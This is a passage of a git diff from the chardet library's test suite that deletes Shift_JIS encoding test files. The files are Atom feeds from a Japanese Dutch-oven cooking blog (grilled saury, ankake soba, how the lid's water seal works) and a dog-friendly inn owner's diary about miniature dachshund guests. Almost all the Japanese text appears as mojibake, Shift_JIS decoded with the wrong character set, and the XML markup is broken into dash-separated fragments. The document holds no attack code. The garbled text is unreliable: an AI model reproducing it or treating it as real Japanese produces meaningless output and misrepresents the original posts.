-‚ָ‚‚ֹA‚א‚₪ˆך“xAƒV[ƒYƒjƒ“ƒO‚©‚ח‚ג‚ט’¼‚¹‚־‚¢‚¢‚¾‚¯‚ֵ‚·B -ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֽA‚»‚ס‚ָ‚ֹ‚ג‚ם‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB - - - - - - - ƒLƒƒƒ“ƒvEƒ_ƒbƒ`ƒI[ƒuƒ“ - - - tag:do.beginnersrack.com,2005://1.34 - - 2005-05-29T16:42:17Z - 2005-10-13T16:43:06Z - - ƒLƒƒƒ“ƒvEƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ׀‰מ‚ֵ‚·B... - - beginner - - - - - - ƒLƒƒƒ“ƒvEƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ׀‰מ‚ֵ‚·B - - - ƒLƒƒƒ“ƒvEƒ_ƒbƒ`ƒI[ƒuƒ“‚ֹ‚ֽA‚R–{‚ּ‘«‚ֲׂ‚¢‚ִ‚¢‚‚·B -’Y‚ּד‚ֹA‚»‚ּ‚‚‚¨‚­‚±‚ֶ‚×o—ˆ‚‚·B - -ƒCƒ“ƒ`”‚ֵ‘ו‚«‚³‚נAƒfƒB[ƒvi[^j‚©”‚©‚ֵ—e—‚וֿ‚ם‚ֱ‚ִ‚«‚‚·B - -ƒV[ƒYƒjƒ“ƒO‚ּטװ‚נָ‚«‚½‚¯‚ך‚־AƒƒWƒbƒNEƒVƒ[ƒY‚׃IƒXƒXƒ‚ֵ‚·B - - - - - - - טל‚טƒXƒpƒCƒXFƒ[ƒYƒ}ƒ[ - - - tag:do.beginnersrack.com,2005://1.33 - - 2005-05-22T16:30:19Z - 2005-10-13T16:32:18Z - - ƒ[ƒYƒ}ƒ[‚ֽAƒ_ƒbƒ`ƒI[ƒuƒ“—¿—‚ֹ‡‚©‚¹‚ָ‚¢h—¿‚ֵ‚·B £‘‡‚³‚¹‚ִA•‘¶‚ֵ... - - beginner - - - - - - - -ƒ[ƒYƒ}ƒ[‚ֽAƒ_ƒbƒ`ƒI[ƒuƒ“—¿—‚ֹ‡‚©‚¹‚ָ‚¢h—¿‚ֵ‚·B -£‘‡‚³‚¹‚ִA•‘¶‚ֵ‚«‚י‚ז‚₪‚ֹ‚µ‚ִ‚‚‚µ‚½B - - - -]]> - ז“תA—Fl‘מ‚©‚חA’כ‚ֹ‚‚₪‚‚₪‚ֹ¶‚¦‚ִ‚¢‚יƒ[ƒYƒ}ƒ[‚נ‘ו—‚ֹ‚א‚ח‚¢‚‚µ‚½B -G‘‚ּ‚²‚ֶ‚­A¶–½—ֽ‚½‚­‚‚µ‚¢ƒ[ƒYƒ}ƒ[‚אA‚ ‚‚ט‚ֹ¬’·‚µ‚·‚¬‚ִƒoƒbƒTƒ״‚ח‚ך‚ִ‚¢‚‚·B - -‚א‚ח‚ֱ‚ִ‚«‚½‚»‚ּƒ[ƒYƒ}ƒ[‚נA‚PTװ‚‚ַ‰A±‚µ‚µA®‘S‚ֹ£‘‡‚³‚¹‚ִ‚©‚חA‚»‚ּ—t‚נז‚טA•r‹l‚‚¢‚½‚µ‚‚µ‚½B - -“ֱ‚ֹA{“ק—¿—‚ֹA‘וˆ–פ‚µ‚»‚₪‚ֵ‚·B - -•r‚ֹ‚ֲ‚‚‚µ‚½‚חA‚¨‰q‚ָ‚ַ‚ּ‘‚ֹ“‚ֱ‚ִ‚¢‚יu£‘‡v‚נˆך‚ֹ“‚ך‚ִA–§•ֲ‚µ‚‚µ‚ו‚₪B - - - - - - - ƒRƒ“ƒ{EƒNƒbƒJ[‚ֵA‚‚®‚כ‚ּƒJƒ}ִ‚« - - - tag:do.beginnersrack.com,2005://1.32 - - 2005-05-09T16:26:20Z - 2005-10-13T16:29:53Z - - •ך‚ּ“ת‚¾‚ֱ‚½ז“ת‚ּ“ת—j“תAָ‚ֹ‘ד‚ם‚ֱ‚ִ–l‚×—¿—‚נ‚µ‚ִ‚‚‚µ‚½B ƒRƒ“ƒ{EƒNƒbƒJ... - - beginner - - - - - - - - -•ך‚ּ“ת‚¾‚ֱ‚½ז“ת‚ּ“ת—j“תAָ‚ֹ‘ד‚ם‚ֱ‚ִ–l‚×—¿—‚נ‚µ‚ִ‚‚‚µ‚½B - -ƒRƒ“ƒ{EƒNƒbƒJ[‚ֵAƒJƒ}ִ‚«‚ֵ‚·B -ƒTƒ“ƒ}‚נƒXƒLƒƒbƒg‚ִֵ‚­‚±‚ֶ‚ֹ‘ו¬ק‚µ‚ִ‚©‚חA‹›—¿—‚נƒ_ƒbƒ`ƒI[ƒuƒ“‚ֵ‚ג‚ֱ‚¿‚‚₪•ָ‚ֲׂ‚¢‚½‚ז‚₪‚ָBB - - -]]> - - -‚¯‚ֱ‚±‚₪‰‚ֵׂ‚ִ‚‚·B -ƒTƒ“ƒ}‚נִ‚¢‚½‚ֶ‚«‚ּA‚ ‚ּƒpƒƒb‚ֶ‚µ‚½´‚¶‚א’‚ֵ‚·B -‚א‚¿‚כ‚סA\•ֹׂ‰־‚×’‚ֱ‚ִ‚‚·‚µA‚׃‚ֱ‚­‚ח´‚אƒoƒbƒ`ƒ‚ֵ‚·B - -‚ג‚ֱ‚ֿ‚טAƒJƒ}ִ‚«‚ֽA‚₪‚‚¢‚ָ‚`B - -ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֶƒNƒbƒLƒ“ƒOƒV[ƒg‚ּƒRƒ“ƒr‚ֱ‚ִA‹\‚¢‚כ‚ס‚ָ—¿—‚ֹg‚¦‚י‚©‚אA‚ֵ‚·‚ֻB - -]]> - - - - ƒRƒ“ƒ{¥ƒNƒbƒJ[‚ֵ“V‚ױ‚ח@״‚ּ‰װ‚ֶƒRƒVƒAƒuƒ‰ - - - tag:do.beginnersrack.com,2005://1.31 - - 2005-05-06T16:22:34Z - 2005-10-13T16:25:58Z - - ״‚ּ‰װ‚ֶƒRƒVƒAƒuƒ‰‚נ“ט‚µ‚‚µ‚½B u‚±‚ך‚ֽA“V‚ױ‚ח‚µ‚©‚ָ‚¢Iv ‚ֶ‚¢‚₪‚ם‚¯‚ֵ... - - beginner - - - - - - - - - -״‚ּ‰װ‚ֶƒRƒVƒAƒuƒ‰‚נ“ט‚µ‚‚µ‚½B - -u‚±‚ך‚ֽA“V‚ױ‚ח‚µ‚©‚ָ‚¢Iv - -‚ֶ‚¢‚₪‚ם‚¯‚ֵAƒ_ƒbƒ`ƒI[ƒuƒ“‚ּƒRƒ“ƒ{EƒNƒbƒJ[‚ֵA“V‚ױ‚ח‚נל‚ֱ‚ִ‚‚‚µ‚½B - - -]]> - - - -ƒTƒbƒNƒƒTƒNƒTƒNA‚»‚µ‚ִ‚¢‚ֱ‚ֿ‚¢‚ֹL‚ׂיt‚ּR‚ּ‚טB -ƒRƒVƒAƒuƒ‰‚ּ‚‚כ‹ך‚³‚ֽA“V‚ױ‚ח‚ֹ‚·‚י‚±‚ֶ‚ֵ˜a‚ח‚¬‚‚·‚×A‚»‚ך‚ֵ‚א‚‚¾‚±‚ּ‚‚כ‹ך‚³‚×ב±c‚ט‚‚·B - -‚µ‚©‚µA‚±‚ך‚ׂ‚½‚¢‚¢III - -‘ו–‘«‚ֵ‚²‚´‚¢‚‚µ‚½B - -‚²‚¿‚»‚₪‚³‚I - -]]> - - - - ƒXƒLƒƒbƒg‚ֵH“‹›iƒTƒ“ƒ}j‚נִ‚­ - - - tag:do.beginnersrack.com,2005://1.30 - - 2005-04-30T16:15:37Z - 2005-10-13T16:22:14Z - - ‚±‚ּת‚ֹƒX[ƒp[‚ֹ‚ָ‚÷ƒTƒ“ƒ}‚×BBB H‚ֹ”„‚ךc‚ֱ‚½ƒTƒ“ƒ}‚נ‰נ“€‚µ‚ִ”„‚ֱ‚ִ‚י... - - beginner - - - - - - - - -‚±‚ּת‚ֹƒX[ƒp[‚ֹ‚ָ‚÷ƒTƒ“ƒ}‚×BBB -H‚ֹ”„‚ךc‚ֱ‚½ƒTƒ“ƒ}‚נ‰נ“€‚µ‚ִ”„‚ֱ‚ִ‚י‚ם‚¯‚©BBB -i‚¾‚©‚חˆְ‚¢j - -‚ֵA‹›—pƒOƒƒ‹‚ִֵ‚­‚ּ‚נ‚ג‚‚ִAƒXƒLƒƒbƒg‚ֵ‚µ‚ִ‚‚‚µ‚½B -‚³‚ִA‚ַ‚₪‚ָ‚ט‚‚·‚ג‚חB - - - -]]> - - -02DƒNƒbƒLƒ“ƒOƒV[ƒg‚ֵA‘וG”c‚ֹ•ן‚‚‚·B -ƒXƒLƒƒbƒg‚ֵH“‹›iƒTƒ“ƒ}j‚נִ‚­ - -03D‚׃‚½‚נ‚µ‚ִ”M‚µ‚ִ‚¨‚¢‚½ƒXƒLƒƒbƒg‚ֹA02D‚נ“‚ך‚‚·B -‚׃‚½‚נ‚µ‚ִA’†‰־‚ֵ‚T•ׂ®‚ח‚¢ִ‚«‚‚·B -ƒXƒLƒƒbƒg‚ֵH“‹›iƒTƒ“ƒ}j‚נִ‚­ - - -04Dִ‚«‰ֱ¸‚נm”F‚µ‚ִAƒTƒ“ƒ}‚נƒNƒbƒLƒ“ƒOƒV[ƒg‚²‚ֶ‚׀‚ֱ‚­‚ט•װ‚µ‚‚·B -‚³‚ח‚ֹA‚R•ׂ‚ִַ‚«‚‚·B -ƒXƒLƒƒbƒg‚ֵH“‹›iƒTƒ“ƒ}j‚נִ‚­ - - -05Dִ‚«‚ ‚ׂט‚‚µ‚½I -ƒXƒLƒƒbƒg‚ֵH“‹›iƒTƒ“ƒ}j‚נִ‚­ - - -06D–{“ת‚ּH‘ל -‚²‚ֽ‚ס‚ֹ‚ ‚ם‚¹‚ִ‚¢‚י‚ּ‚ֽAעƒ–x–¼•¨u‚׃‚«‚ּ‚ֶ‚₪‚‚»v -¿‘f‚ֵ‚·‚©H@–l‚ֹ‚ֶ‚ֱ‚ִA‚²’y‘–‚ָ‚ס‚ֵ‚·‚×B -ƒXƒLƒƒbƒg‚ֵH“‹›iƒTƒ“ƒ}j‚נִ‚­ - - -07D‚¨‚‚¯ -ƒzƒl‚ֽA¡ˆך“xƒXƒLƒƒbƒg‚ֵy‚­‚¢‚½‚‚‚·‚ֶA”–¡‚µ‚¢ƒzƒl‚¹‚ס‚׳‚¢‚ּo—ˆד‚ׂטB -‚±‚ך‚׈ך”װ‚₪‚‚©‚ֱ‚½‚ט‚µ‚ִB -ƒXƒLƒƒbƒg‚ֵH“‹›iƒTƒ“ƒ}j‚נִ‚­ - - - -¡ˆך¾ƒRƒƒ“ƒg - -‹›ִ‚«—pƒOƒƒ‹‚×AƒNƒbƒLƒ“ƒOƒƒ“ƒW‚ּ‰÷‚ֹ‚ ‚ט‚‚·‚×A‚ ‚ך‚נg‚₪•K—v‚ֽ‚ָ‚¢‚ֶ´‚¶‚‚µ‚½B -ƒXƒLƒƒbƒg‚ֵ\•ֵׂ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©B - -ƒƒƒbƒgF -@E‰‚ֵׂ‚ָ‚¢B -@@ƒXƒLƒƒbƒg‚ּ‚׃‚½‚נ‚·‚י‚ּ‚ֵA”–¡‚³‚א…•ׂא—]v‚ֹ¸‚ם‚ך‚‚¹‚סB -@E‹›ִ‚«—pƒOƒƒ‹‚ּ’ך‚ֹA…‚נ‚ֽ‚י•K—v‚א‚ָ‚¢B -@@“–‘R‚ֵ‚·‚×Aד•׀•t‚¯‚אƒ‰ƒNB -@E‹›‚ׂ׃‚ֱ‚­‚ח‚ִֶ‚«‚ ‚ׂיB -@@‚µ‚©‚אA•\–‚ֽƒpƒƒb‚ֶA’צ‚ז‚¢ֵ‚°–‚ֲׂ‚¢‚ִ‚‚·B -@@ƒXƒLƒƒbƒg‚×A”–¡‚³‚א…•ׂאO‚ֹ“¦‚ׂ³‚ָ‚¢‚©‚ח‚ֵ‚·‚ֻB -@E‹›‚ׂא‚ֲ‰‚ׂ¶‚ם‚ֱ‚ֶ‚µ‚‚ֵ‚י‚ּ‚ֵA–‚נ—]•ֹׂ—¬‚µ‚¢‚ך‚י•K—v‚ָ‚µB -@@ƒ_ƒbƒ`ƒI[ƒuƒ“‚ָ‚ח‚ֵ‚ֽ‚ֵ‚·B -@@“–‘RAƒwƒ‹ƒV[‚ֵ‚·‚¼B - -ƒfƒƒƒbƒgF -@Ev‚¢‚ֲ‚©‚סBBB - -ƒLƒbƒ`ƒ“‚ֵg‚₪‚ָ‚חA‚ג‚ֱ‚ֿ‚טƒXƒLƒƒbƒg‚ֵ‚·‚ֻB -‚±‚ך‚ֽ–{“–‚ֹ•ײ—˜B -‚א‚₪AƒOƒƒ‹‚ֽ•K—v‚ָ‚¢‚©‚אiHHj - -”–¡‚©‚ֱ‚½I -‚²‚¿‚»‚₪‚³‚‚ֵ‚µ‚½@(P[PjB - - -]]> - - - - ƒXƒLƒƒbƒg‚ֵ‚ ‚ס‚©‚¯ִ‚«‚»‚־ - - - tag:do.beginnersrack.com,2005://1.29 - - 2005-04-29T16:09:14Z - 2005-10-13T16:15:18Z - - ז“תAƒeƒƒr‚ּ‚u‚U‚ּ”װ‘g‚ֵA‚ ‚ס‚©‚¯ƒ`ƒƒ[ƒnƒ“‚נ”–¡‚µ‚»‚₪‚ֹH‚׳‚ִ‚¢‚י‰f‘‚נ©... - - beginner - - - - - - - - - -ז“תAƒeƒƒr‚ּ‚u‚U‚ּ”װ‘g‚ֵA‚ ‚ס‚©‚¯ƒ`ƒƒ[ƒnƒ“‚נ”–¡‚µ‚»‚₪‚ֹH‚׳‚ִ‚¢‚י‰f‘‚נ©‚‚µ‚½B - -@@@EEE@@@‚¶‚ד‚י‚¶‚ד‚יB - -ƒXƒLƒƒbƒg‚ֵ—‚½‚ז‚₪‚ָ‚א‚ּ‚נל‚ֱ‚ִ‚ג‚י‚÷I - - -]]> - - - -02D…‚נ250`300cciD‚‚ֵ‰ֱ¸‚µ‚ִ‚­‚¾‚³‚¢j‰ֱ‚¦A’†‰״ƒX[ƒv‚ּ‚א‚ֶi‚±‚ך‚אט”²‚«‚¾‚ֻjA‰–E׃£‚ֵ–¡‚נ’²‚¦‚‚·B -…‚ֵ—n‚¢‚½•׀I‚נ—¬‚µ‚¢‚ךA‚ֶ‚כ‚‚נ‚ֲ‚¯‚‚·B -o—ˆד‚ֱׂ‚½u‚ ‚סv‚ֽAם‚ֹ‚₪‚ֲ‚µ‚‚·B -ƒXƒLƒƒbƒg‚ֵ‚ ‚ס‚©‚¯ִ‚«‚»‚־ - - -03D‚·‚־‚ג‚­ƒXƒLƒƒbƒg‚נ…‚ֵפ‚¢A‚»‚־‚נִ‚«‚‚·B -‚ז‚­‚‚®‚ך‚½‚חA¡“x‚ֽ‚ ‚‚ט‚‚÷‚‚¹‚סB–ֻ‚ֹ‚¿‚ו‚ֱ‚ֶ‚±‚°‚נ‚ֲ‚©‚¹‚‚µ‚ו‚₪B -ƒXƒLƒƒbƒg‚ֵ‚ ‚ס‚©‚¯ִ‚«‚»‚־ - - -04DH‘ל‚ֹ“ח‚µ‚«‚נ‚¨‚«A‚»‚±‚ֹA‚»‚־‚נ‚¢‚ך‚½‚‚‚ּƒAƒcƒAƒc‚ּƒXƒLƒƒbƒg‚נ‚¨‚«‚‚·B -‚»‚µ‚ִAש‚ֹל‚ֱ‚ִ‚¨‚¢‚½‚ ‚ס‚נ—¬‚µ‚‚‚·B -@ -@@@‚¶‚ד‚ם` - -‚»‚ּ‰f‘‚ֽAƒRƒ`ƒ‰ - -‚ ‚ס‚©‚¯ִ‚«‚»‚־‚ּ´“®‚ּ‰f‘ - -‚²‚¿‚»‚₪‚³‚‚ֵ‚µ‚½i–‘«jI - -]]> - - - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ּˆ³—ֽ‹@”\ - - - tag:do.beginnersrack.com,2005://1.28 - - 2005-04-26T16:07:24Z - 2005-10-13T16:08:56Z - - ˆ³—ֽ“ח‚ּ‚ז‚₪‚ָ‚ֽ‚½‚ח‚«‚אAƒ_ƒbƒ`ƒI[ƒuƒ“‚ֹ‚ֽ‚ ‚י‚ס‚ֵ‚·B ... - - beginner - - - - - - ˆ³—ֽ“ח‚ּ‚ז‚₪‚ָ‚ֽ‚½‚ח‚«‚אAƒ_ƒbƒ`ƒI[ƒuƒ“‚ֹ‚ֽ‚ ‚י‚ס‚ֵ‚·B - - - - “ח–{‘ּ‚ֹ‚ׂ‚ֱ‚½‚טƒtƒBƒbƒg‚ּ‚׃‚½‚ֽA‚ֶ‚ִ‚אd‚¢‚ּ‚ֵ‚·B -ƒEƒH[ƒ^[ƒV[ƒ‹‚³‚ך‚½“ח‚ֽA‚»‚ּd‚¢‚׃‚½‚ּ‚¨‚©‚°‚ֵA“א•”‚ּˆ³—ֽ‚נ‚‚‚י‚±‚ֶ‚ֵׂ‚«‚י‚ּ‚ֵ‚·B -‚¾‚©‚חA’Zװ‚ֵ‘f‚נc‚‚ֵ‚ג‚ם‚ח‚©‚­‚·‚י‚±‚ֶ‚ֵׂ‚«‚י‚ם‚¯‚ֵ‚·B - -‚±‚ך‚ֽ‚א‚₪Aˆ³—ֽ“ח‚ּ‚ז‚₪‚ָ‚א‚ּB - -‚½‚¾‚µAˆ³—ֽ“ח‚ּ‚ז‚₪‚ֹA‚¬‚ט‚¬‚ט‚ֶƒlƒW‚נ‚µ‚‚ִ®‘S‚ָ–§••ף‘װA‚ֶ‚‚ֵ‚ֽ‚¢‚«‚‚¹‚סB -‚׃‚½‚ּd‚‚ֹ‚אAְE‚ׂ ‚ט‚‚·B -‚׃‚½‚ֶ‚ָ‚׳‚ּ„װ‚©‚חAצ‹C‚×o‚ִ‚µ‚‚₪‚ּ‚אAd•‚ָ‚¢‚ּ‚ֵ‚·B - -‚ֵ‚אAצ‹C‚טR‚ך‚י‚ּ‚א‚ז‚כ‚µ‚¢‚ֵ‚ֽ‚ ‚ט‚‚¹‚ס‚©B -”–¡‚»‚₪‚ָ“ץ‚¢‚נy‚µ‚‚י‚ס‚ֵ‚·‚©‚חB - -­‚ָ‚­‚ֶ‚אA‚½‚¾‚ּ“ח‚ֵ‚ֽ‘ּ±‚ֵ‚«‚ָ‚¢‚­‚ח‚¢A‘f‚נ‚µ‚ֱ‚©‚טˆ³—ֽ‚ֶ‹₪‚ֹ”M‚µA‘f‚ּ‚א‚ֲ–{—ˆ‚ּ–¡‚נˆר‚«o‚µ‚ִ‚­‚ך‚י‚ס‚ֵ‚·‚©‚חB - - - - - - - ƒEƒH[ƒ^ƒV[ƒ‹ - - - tag:do.beginnersrack.com,2005://1.27 - - 2005-04-24T16:06:20Z - 2005-10-13T16:07:15Z - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֽA“ח‚ֶ‚׃‚½‚©‚ח¬‚ט—§‚ֱ‚ִ‚¢‚‚·B ‚׃‚½‚אA‚»‚ך‚ָ‚ט‚ֹd‚¢‚ּ‚ֵA–l... - - beginner - - - - - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֽA“ח‚ֶ‚׃‚½‚©‚ח¬‚ט—§‚ֱ‚ִ‚¢‚‚·B -‚׃‚½‚אA‚»‚ך‚ָ‚ט‚ֹd‚¢‚ּ‚ֵA–l‚ּƒLƒƒƒ“ƒvEƒ_ƒbƒ`ƒI[ƒuƒ“ 12ƒCƒ“ƒ` ƒfƒB[ƒv ‚ֽA‚ ‚ם‚¹‚ִ‚P‚O‚‹‚‡‚‚ַ‚ּd‚³‚ֹ‚ָ‚ט‚‚·B - -‚»‚µ‚ִA‚׃‚½‚ּ‚א‚ֲ‹@”\‚נ׀‰מ‚µ‚‚·B - - - d[‚¢‚׃‚½‚ֽA–{‘ּ‚ֶ‚ׂ‚ֱ‚½‚טd‚ָ‚ט‚‚·B -‚»‚µ‚ִA—¿—‚µ‚ִ‚¢‚יƒV[ƒ“‚נ‘z‘‚µ‚ִ‚‚ִ‚­‚¾‚³‚¢B - -‚¶‚ֱ‚­‚ט‚ֶ‰·‚‚ח‚ך‚½‘f‚ֽA‚»‚ך©‘ּ‚ׂא‚ֲ…•ֵׂAצ‚³‚ך‚ִ‚¢‚«‚‚·B -‚»‚ּצ‹C‚ֽAƒ_ƒbƒ`ƒI[ƒuƒ“‚ּ“ח‚ּ‚ָ‚©‚נ‹ל‚¯„‚טA‚׃‚½‚נ‚±‚¶J‚¯‚ִO‚ֹo‚ז‚₪‚ֶ‚µ‚‚·B - -‚µ‚©‚µA‚׃‚½©‘ּ‚×d‚¢‚ּ‚ֵAָ’P‚ֹO‚ּ¢E‚ֹ‚ֽo‚י‚±‚ֶ‚ֵׂ‚«‚‚¹‚סB -‚»‚₪A‚»‚ּ‚ֶ‚«A‚׃‚½‚ֶ“ח‚ּװ‚ּA‚ם‚¸‚©‚ָ„װ‚ֹA…צ‹C‚×…‚ֶ‚ָ‚טA‚ׂ‚ֱ‚¿‚ט‚ֶ‚נ‚׃‚³‚¢‚ֵ‚µ‚‚₪‚ּ‚ֵ‚·B - -‚±‚ך‚×AƒEƒH[ƒ^[ƒV[ƒ‹B - -‚א‚¿‚כ‚סA‰־‰ֱ¸‘ז‚ֵA…צ‹C‚ׂ׃‚½‚נ‚±‚¶J‚¯‚ִO‚ֹ”–¡‚µ‚»‚₪‚ָ“ץ‚¢‚נ“f‚«o‚µ‚‚·‚×A‚±‚ך‚ׂ¿‚ו‚₪‚ַ‚¢‚¢‰–”~‚ֵAˆ³—ֽ‚נ’²®‚µ‚ִ‚­‚ך‚י‚ּ‚ֵ‚·B - -–§••«‚ׂ‚‚יA‚»‚ס‚ָd‘g‚‚נAƒ_ƒbƒ`ƒI[ƒuƒ“‚ֽ‚ֱ‚ִ‚¢‚י‚ם‚¯‚ֵ‚·B - - - - - - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֱ‚ִ‰½H - - - tag:do.beginnersrack.com,2005://1.26 - - 2005-04-23T16:04:52Z - 2005-10-13T16:06:03Z - - ƒ_ƒbƒ`ƒI[ƒuƒ“A‚»‚ך‚ֽd‚­A•‚­A‚ַ‚ֱ‚µ‚ט‚µ‚½‘¶´‚ׂ ‚טA‚¢‚©‚ֹ‚אƒAƒEƒgƒhƒA—¿... - - beginner - - - - - - ƒ_ƒbƒ`ƒI[ƒuƒ“A‚»‚ך‚ֽd‚­A•‚­A‚ַ‚ֱ‚µ‚ט‚µ‚½‘¶´‚ׂ ‚טA‚¢‚©‚ֹ‚אƒAƒEƒgƒhƒA—¿—‚ֹ‚ׂ‚ֱ‚½‚ט‚ּ“S“ח‚נ˜A‘z‚·‚יl‚ב½‚¢‚ֶv‚¢‚‚·B -m‚©‚ֹA‚»‚ּ’‚טB -‚¾‚©‚חA‚ַ‚¿‚ח‚©‚ֶ¾‚¦‚־A’j‚ּ—¿—‚ֹg‚ם‚ך‚י‚²‚ֱ‚ֲ‚¢“חA‚ֶ‚¢‚₪ƒCƒ[ƒW‚נ‚ֲl‚א‘½‚¢‚¾‚כ‚₪‚ֶv‚¢‚‚·B -‚ֵ‚אAƒCƒ“ƒhƒAA‚ֲ‚‚טƒLƒbƒ`ƒ“‚ֵ‚אg‚ֱ‚ִ‚¢‚יו•w‚ּ•‚א‘½‚¢‚ס‚ֵ‚·‚ז‚ֻB - - - ƒ_ƒbƒ`ƒI[ƒuƒ“‚ֶ‚ֽAƒAƒƒƒJ‚ּJ‘ס‘ד‚ֹA¼‚ײˆ“®‚·‚יlX‚ֹ‚ֶ‚ֱ‚ִA—¿—‚נ‚·‚י‚₪‚¦‚ֵ‚ּ•Kש•i‚¾‚ֱ‚½‚»‚₪‚ֵ‚·B -‚ָ‚ס‚ֶ‚אA–y”nװ‚ֹƒ}ƒbƒ`‚·‚י‚ֵ‚ֽ‚ָ‚¢‚ֵ‚·‚©B -‰־‚נ‚¨‚±‚µA‚¨‚«‚ּד‚ֹ‚ ‚ּ“S“ח‚נ‚¨‚«A‚ה‚ֱ‚­‚ט‚ֶ‘f‚נ‚ג‚³‚µ‚­‰ֱ”M‚µA‚¢‚ֲ‚ּ‚‚ֹ‚©‚¨‚¢‚µ‚¢—¿—‚×o—ˆד‚ׂיB -–¡•t‚¯‚ֽ‚¢‚½‚ֱ‚ִƒVƒ“ƒvƒ‹B -‘f‚ּ‚א‚ֲ‚₪‚‚³‚נֵ‘וְ‚ֹˆר‚«o‚µ‚ִ‚­‚ך‚יB - -–‚–@‚ּ‚ָ‚׳ - -‚»‚ס‚ָ•—‚ֹA‚ז‚­¾‚ם‚ך‚‚·B - -‘f‚ֽ’’“S»B -“S‚נ^‚ֹ—¬‚µ‚ס‚ֵ‚ֲ‚­‚י“ח‚ֵ‚·B - -“ח‚»‚ּ‚א‚ּ‚דקת‚ָ‚ּ‚ֵA”M‚נ‚µ‚ֱ‚©‚ט‚ֶ•‚µ‚‚·B -‚¾‚©‚חA‘f‚נ“‚ך‚י‚½‚ׁ‚ֹA‰·“x‚׋}ƒ‚ֹ‰÷‚ׂיA‚ָ‚ס‚ִ‚±‚ֶ‚ָׂ‚¢‚ּ‚ֵAˆך’ט‚ּ‰·“x‚ֵ‚ּ’²—‚׉ֲ”\‚ָ‚ּ‚ֵ‚·B - - - - - - - - diff --git a/chardet/tests/SHIFT_JIS/dogsinn.jp.xml b/chardet/tests/SHIFT_JIS/dogsinn.jp.xml deleted file mode 100644 index 54fa638..0000000 --- a/chardet/tests/SHIFT_JIS/dogsinn.jp.xml +++ /dev/null @@ -1,427 +0,0 @@ - - - -ƒyƒbƒg‚ֶ”‘‚‚ך‚יh‚ּƒI[ƒi[“ת‹L - -2005-07-29T14:37:59Z - -tag:www.dogsinn.jp,2005:/owner//2 -Movable Type -Copyright (c) 2005, dogsinn - -¡“ת‚ֽƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ּƒIƒt‰ןH - -2005-07-29T14:37:59Z -2005-07-29T14:32:11Z -tag:www.dogsinn.jp,2005:/owner//2.188 -2005-07-29T14:32:11Z -¡“ת‚ֽƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚־‚ֱ‚©‚ט‚ֵ‚·B ƒIƒt‰ן‚ֵ‚אJ‚­¨‚¢‚ֵ‚·B¡“ת‚ּ—\–ס‚ֵ‚א ... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -¡“ת‚ֽƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚־‚ֱ‚©‚ט‚ֵ‚·B
    -ƒIƒt‰ן‚ֵ‚אJ‚­¨‚¢‚ֵ‚·B¡“ת‚ּ—\–ס‚ֵ‚א
    -ƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚נ”‚ֱ‚ִ‚¢‚י‚¨‹q—l‚ּ
    -‚²—\–ס‚ב½‚©‚ֱ‚½‚ֵ‚·B
    -–{“–‚ֹƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ֽ‘½‚¢‚ּ‚ֵ‚·‚ֻB
    -‚‚ס‚ָ‚»‚ך‚¼‚ך‘S‚­ˆב‚₪¢ם‚ּ—l‚ֹA
    -–ׁ‚ּ¶‚¦•‚׈ב‚¢‚‚·B
    -¡ד‚א‘‚¦‚ִ‚¢‚­‚ּ‚ֵ‚µ‚ו‚₪‚ֻB

    ]]> - -
    -
    - -ƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ׂג‚ֽ‚טˆך”װ‘½‚¢‚ּ‚©‚ָH - -2005-07-28T12:48:34Z -2005-07-28T12:44:14Z -tag:www.dogsinn.jp,2005:/owner//2.187 -2005-07-28T12:44:14Z -ƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ּ‚¨”‘‚ט‚׈ך”װ‘½‚¢I ‚ג‚ֽ‚טl‹Cƒ‰ƒ“ƒLƒ“ƒO‚ֵם‚ֹƒgƒbƒv‚נ‘–‚י‚¾... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -ƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ּ‚¨”‘‚ט‚׈ך”װ‘½‚¢I
    -‚ג‚ֽ‚טl‹Cƒ‰ƒ“ƒLƒ“ƒO‚ֵם‚ֹƒgƒbƒv‚נ‘–‚י‚¾‚¯‚ֽ‚ ‚ט‚‚·‚ֻB
    -©‚ָ‚¢“ת‚ֽ–³‚¢‚®‚ח‚¢A‚¨‚¢‚ֵ‚ֹ‚ָ‚ח‚ך‚‚·B
    -ֵ‹‚ֽFX‚ָƒ^ƒCƒv‚ׂ ‚י‚ּ‚ֹ‚ֽA‹ֱ‚«‚ֵ‚·B
    -‚‚¾‚‚¾ƒ~ƒjƒ`ƒ…ƒAƒ_ƒbƒNƒX‚ּƒu[ƒ€‚ֽ‘±‚«‚»‚₪‚ֵ‚·B
    -‚©‚ם‚¢‚¢‚ֵ‚·‚א‚ס‚ֻB

    ]]> - -
    -
    - -ִ¢‚ׂ¨”‘‚ט‚ֹ‚«‚‚µ‚½ - -2005-07-27T13:07:53Z -2005-07-27T12:57:37Z -tag:www.dogsinn.jp,2005:/owner//2.186 -2005-07-27T12:57:37Z -ִ¢‚ׂ¨”‘‚ט‚ֹ‚«‚‚µ‚½B ˆִO‘½‚¢‚ֵ‚·‚זB ‚ג‚ֽ‚ט“ת–{‚ּ‘ד•\¢‚ֵ‚·‚©‚ח‚ֻB ֵ‹... - -dogsinn -http://www.dogsinn.jp/ -info@dogsinn.jp - -ƒI[ƒi[‚ּ“ֶ‚ט¾ - -ִ¢‚ׂ¨”‘‚ט‚ֹ‚«‚‚µ‚½B
